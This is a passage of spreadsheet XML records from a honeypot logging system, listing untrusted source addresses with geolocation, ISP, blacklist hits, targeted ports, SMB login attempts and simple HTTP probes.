    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75c5:5339"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1680"/>
    <x v="1680"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-15T10:20:52"/>
    <d v="2025-04-15T10:20:19"/>
    <d v="2025-04-15T10:20:52"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'cbl.abuseat.org': ['unknown']}"/>
    <n v="32"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="KA"/>
    <s v="Karnataka"/>
    <s v="Bengaluru Urban"/>
    <s v="Bengaluru"/>
    <s v="1277333"/>
    <s v="560056"/>
    <s v="12.9716"/>
    <s v="77.5946"/>
    <s v="9829"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="BSNL Internet"/>
    <s v="residential"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75d7:3318"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1681"/>
    <x v="1681"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-15T10:17:10"/>
    <d v="2025-04-15T10:17:10"/>
    <d v="2025-04-15T10:17:10"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="KR"/>
    <s v="South Korea"/>
    <s v="11"/>
    <s v="Seoul"/>
    <s v="Yongsan-gu"/>
    <s v="Yongsan-dong (Hangang-daero)"/>
    <s v="6800487"/>
    <s v="NA"/>
    <s v="37.5379"/>
    <s v="126.97"/>
    <s v="17858"/>
    <s v="POWERVIS-AS-KR"/>
    <s v="Lg Powercomm"/>
    <s v="corporate"/>
    <s v="Lg Powercomm"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7093:b5fd"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1682"/>
    <x v="1682"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-15T09:52:35"/>
    <d v="2025-04-15T09:52:35"/>
    <d v="2025-04-15T09:52:35"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'zen.spamhaus.org': ['unknown']}"/>
    <n v="33"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="DL"/>
    <s v="Delhi"/>
    <s v="New Delhi"/>
    <s v="New Delhi (Block N)"/>
    <s v="1261481"/>
    <s v="110001"/>
    <s v="28.6309"/>
    <s v="77.2229"/>
    <s v="9829"/>
    <s v="BSNL-NIB"/>
    <s v="BSNL Internet"/>
    <s v="consumer"/>
    <s v="Wimax Project"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75fd:f7f9"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1683"/>
    <x v="1683"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-15T09:29:11"/>
    <d v="2025-04-05T10:49:09"/>
    <d v="2025-04-15T09:29:11"/>
    <n v="56"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_SMB_H23"/>
    <s v="1433&amp;&amp;445"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="DL"/>
    <s v="Delhi"/>
    <s v="South East"/>
    <s v="New Delhi (Okhla)"/>
    <s v="1261481"/>
    <s v="110020"/>
    <s v="28.5317"/>
    <s v="77.2766"/>
    <s v="24560"/>
    <s v="Bharti Airtel Limited"/>
    <s v="Bharti Airtel"/>
    <s v="residential"/>
    <s v="Bharti Telenet Ltd."/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (122.176.65.155,60894)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (WORKGROUPAdministrator,WIN-31E8922P57M)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (WORKGROUPAdministrator,WIN-31E8922P57M)}&amp;&amp;{Data_SMB:Incoming connection (122.176.65.155,51397)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (WORKGROUPAdministrator,WIN-31E8922P57M)}&amp;&amp;{Data_SMB:Incoming connection (122.176.65.155,52023)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (WORKGROUPAdministrator,WIN-31E8922P57M)}&amp;&amp;{Data_SMB:Incoming connection (122.176.65.155,56859)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (WORKGROUPAdministrator,WIN-31E8922P57M)}&amp;&amp;{Data_SMB:Incoming connection (122.176.65.155,57476)}&amp;&amp;{Data_SMB:Incoming connection (122.176.65.155,54442)}&amp;&amp;{Data_SMB:Incoming connection (122.176.65.155,60455)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (WORKGROUPAdministrator,WIN-31E8922P57M)}&amp;&amp;{Data_SMB:Incoming connection (122.176.65.155,49435)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (WORKGROUPAdministrator,WIN-31E8922P57M)}&amp;&amp;{Data_SMB:Incoming connection (122.176.65.155,50096)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (WORKGROUPAdministrator,WIN-31E8922P57M)}&amp;&amp;{Data_SMB:Incoming connection (122.176.65.155,55448)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (WORKGROUPAdministrator,WIN-31E8922P57M)}&amp;&amp;{Data_SMB:Incoming connection (122.176.65.155,56114)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (WORKGROUPAdministrator,WIN-31E8922P57M)}&amp;&amp;{Data_SMB:Incoming connection (122.176.65.155,61439)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (WORKGROUPAdministrator,WIN-31E8922P57M)}&amp;&amp;{Data_SMB:Incoming connection (122.176.65.155,62095)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (WORKGROUPAdministrator,WIN-31E8922P57M)}&amp;&amp;{Data_SMB:Incoming connection (122.176.65.155,51040)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (WORKGROUPAdministrator,WIN-31E8922P57M)}&amp;&amp;{Data_SMB:Incoming connection (122.176.65.155,51684)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (WORKGROUPAdministrator,WIN-31E8922P57M)}&amp;&amp;{Data_SMB:Incoming connection (122.176.65.155,56993)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (WORKGROUPAdministrator,WIN-31E8922P57M)}&amp;&amp;{Data_SMB:Incoming connection (122.176.65.155,57654)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (WORKGROUPAdministrator,WIN-31E8922P57M)}&amp;&amp;{Data_SMB:Incoming connection (122.176.65.155,62960)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (WORKGROUPAdministrator,WIN-31E8922P57M)}&amp;&amp;{Data_SMB:Incoming connection (122.176.65.155,63581)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (WORKGROUPAdministrator,WIN-31E8922P57M)}&amp;&amp;{Data_SMB:Incoming connection (122.176.65.155,52514)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (WORKGROUPAdministrator,WIN-31E8922P57M)}&amp;&amp;{Data_SMB:Incoming connection (122.176.65.155,53155)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (WORKGROUPAdministrator,WIN-31E8922P57M)}&amp;&amp;{Data_SMB:Incoming connection (122.176.65.155,58443)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (WORKGROUPAdministrator,WIN-31E8922P57M)}&amp;&amp;{Data_SMB:Incoming connection (122.176.65.155,59058)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (WORKGROUPAdministrator,WIN-31E8922P57M)}&amp;&amp;{Data_SMB:Incoming connection (122.176.65.155,64356)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (WORKGROUPAdministrator,WIN-31E8922P57M)}&amp;&amp;{Data_SMB:Incoming connection (122.176.65.155,64976)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (WORKGROUPAdministrator,WIN-31E8922P57M)}&amp;&amp;{Data_SMB:Incoming connection (122.176.65.155,53895)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (WORKGROUPAdministrator,WIN-31E8922P57M)}&amp;&amp;{Data_SMB:Incoming connection (122.176.65.155,54518)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (WORKGROUPAdministrator,WIN-31E8922P57M)}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7ab0:419b"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1684"/>
    <x v="1684"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-15T09:25:50"/>
    <d v="2025-01-13T20:46:42"/>
    <d v="2025-04-15T09:25:50"/>
    <n v="11"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:mail']&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H6&amp;&amp;SMA-LAB_MT-CPA_H23&amp;&amp;SMA-LAB_TELNET_H27"/>
    <s v="23&amp;&amp;56224"/>
    <s v="True"/>
    <s v="{'all.s5h.net': ['unknown']}"/>
    <n v="28"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:mail']"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="LV"/>
    <s v="Latvia"/>
    <s v="099"/>
    <s v="Tukuma novads"/>
    <s v="Tukums"/>
    <s v="Tukums"/>
    <s v="454768"/>
    <s v="NA"/>
    <s v="56.9669"/>
    <s v="23.1543"/>
    <s v="43513"/>
    <s v="Sia Nano IT"/>
    <s v="Sia Nano IT"/>
    <s v="business"/>
    <s v="SIA Infonet Sistemas"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:5b87:516d"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="high"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1685"/>
    <x v="1685"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-15T09:15:27"/>
    <d v="2024-03-07T08:42:00"/>
    <d v="2025-04-15T09:15:27"/>
    <n v="134"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_SSH_H4&amp;&amp;SMA-LAB_MT-CPA_H37&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H45"/>
    <s v="23&amp;&amp;22&amp;&amp;46205"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="MH"/>
    <s v="Maharashtra"/>
    <s v="Thane"/>
    <s v="Bhayandar"/>
    <s v="1276014"/>
    <s v="NA"/>
    <s v="19.3016"/>
    <s v="72.8511"/>
    <s v="138296"/>
    <s v="Juweriyah Networks Private Limited"/>
    <s v="Ankhnet"/>
    <s v="business"/>
    <s v="Ankhnet Informations Pvt. Ltd."/>
    <s v="2007-02-28"/>
    <s v="ANKHNET"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:cab3:5b09"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1686"/>
    <x v="1686"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-15T09:14:37"/>
    <d v="2025-04-15T08:20:35"/>
    <d v="2025-04-15T09:14:37"/>
    <n v="5"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H5"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="VN"/>
    <s v="Vietnam"/>
    <s v="SG"/>
    <s v="Ho Chi Minh"/>
    <s v="NA"/>
    <s v="Ho Chi Minh City"/>
    <s v="1566083"/>
    <s v="NA"/>
    <s v="10.8231"/>
    <s v="106.63"/>
    <s v="45899"/>
    <s v="VNPT Corp"/>
    <s v="VNPT-VNNIC"/>
    <s v="residential"/>
    <s v="VietNam Post and Telecom Corporation"/>
    <s v="2010-08-16"/>
    <s v="VNPT-VN"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:ea9:6bf4"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1687"/>
    <x v="1687"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-15T09:12:22"/>
    <d v="2024-06-21T23:12:23"/>
    <d v="2025-04-15T09:12:22"/>
    <n v="128"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SMB_H34&amp;&amp;SMA-LAB_MT-CPA_H18&amp;&amp;SMA-LAB_SSH_H31&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MYSQL_H13&amp;&amp;SMA-LAB_MSSQL_H13&amp;&amp;SMA-LAB_MYSQL_HC1"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;445&amp;&amp;34263&amp;&amp;22&amp;&amp;1433&amp;&amp;3306&amp;&amp;50876&amp;&amp;50895&amp;&amp;50956&amp;&amp;51545"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="ID"/>
    <s v="Indonesia"/>
    <s v="JK"/>
    <s v="Jakarta"/>
    <s v="Kota Administrasi Jakarta Pusat"/>
    <s v="Jakarta"/>
    <s v="1642911"/>
    <s v="NA"/>
    <s v="-6.20309"/>
    <s v="106.845"/>
    <s v="131111"/>
    <s v="PT Mora Telematika Indonesia"/>
    <s v="MORATELINDONAP"/>
    <s v="business"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="login&amp;&amp;connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_MYSQL:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:679a:51a2"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1688"/>
    <x v="1688"/>
    <s v="59-126-242-72.hinet-ip.hinet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-15T09:11:18"/>
    <d v="2024-05-09T10:46:00"/>
    <d v="2025-04-15T09:11:18"/>
    <n v="913"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MT-CPA_H11&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_HTTP_H8&amp;&amp;SMA-LAB_TELNET_H4&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_MT-CPA_H37&amp;&amp;SMA-LAB_TELNET_H31&amp;&amp;SMA-LAB_TELNET_H32"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;22017&amp;&amp;23&amp;&amp;80&amp;&amp;50359&amp;&amp;50378&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GET&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '149.102.153.168:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '109.123.229.33:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.171.39:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.209.6:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3b7e:f248"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1689"/>
    <x v="1689"/>
    <s v="114-33-3-24.hinet-ip.hinet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-15T09:10:54"/>
    <d v="2024-05-28T05:37:03"/>
    <d v="2025-04-15T09:10:54"/>
    <n v="896"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic&amp;&amp;Suspicious Web Activity Detected"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MT-CPA_H41&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H4&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_MT-CPA_H24&amp;&amp;SMA-LAB_HTTP_H6&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H30&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H6"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;21434&amp;&amp;23&amp;&amp;13604&amp;&amp;80&amp;&amp;17779&amp;&amp;33893&amp;&amp;9100&amp;&amp;22804&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GET&amp;&amp;login&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '194.233.76.135:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '154.93.37.45:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.209.6:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7221:318"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1690"/>
    <x v="1690"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-15T09:04:57"/>
    <d v="2025-04-15T09:04:57"/>
    <d v="2025-04-15T09:04:57"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']&amp;&amp; 'zen.spamhaus.org': ['unknown']}"/>
    <n v="73"/>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5:c79e"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1691"/>
    <x v="1691"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-15T08:47:14"/>
    <d v="2025-04-15T08:41:15"/>
    <d v="2025-04-15T08:47:14"/>
    <n v="6"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="TR"/>
    <s v="Turkey"/>
    <s v="01"/>
    <s v="Adana"/>
    <s v="Adana"/>
    <s v="Adana"/>
    <s v="325363"/>
    <s v="NA"/>
    <s v="36.9914"/>
    <s v="35.3308"/>
    <s v="47331"/>
    <s v="TTNet A.S."/>
    <s v="TTNet A.S."/>
    <s v="residential"/>
    <s v="Turk Telekomunikasyon A.S"/>
    <s v="None"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:5568:78f8"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1692"/>
    <x v="1692"/>
    <s v="171-103-167-166.static.asianet.co.th&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-15T08:19:56"/>
    <d v="2024-04-11T13:23:00"/>
    <d v="2025-04-15T08:19:56"/>
    <n v="102"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
